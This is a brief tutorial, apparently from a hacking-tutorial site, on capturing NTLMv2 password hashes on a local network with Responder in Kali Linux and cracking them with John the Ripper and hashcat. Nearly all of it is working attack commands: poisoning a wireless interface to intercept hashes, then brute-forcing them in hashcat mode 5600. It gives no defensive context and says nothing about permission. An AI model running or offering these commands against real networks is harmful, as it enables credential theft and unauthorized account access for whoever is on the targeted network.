Capturing and cracking NTLMv2 Hashes in Kali | QuickTutorials | HOXFRAMEWORK
Hello and welcome,
In this tutorial you will simply turn on responder on kali using :
responder -I wlan0
responder -I wlan0 -w -r -P
if you are using eth0 use that instead.
Then once you captured the hash you want to crack, isolate it into a text file.
After that all you have to do is use john or hydra to crack the password. Make sure you start the session
every time so you dont lose the progress.
>john --format=netntlmv2 hash.txt
>hashcat -m 5600 -a 3 hash.txt
-here we are specifying netntlmv2(5600) and attack mode 3 (-a 3)
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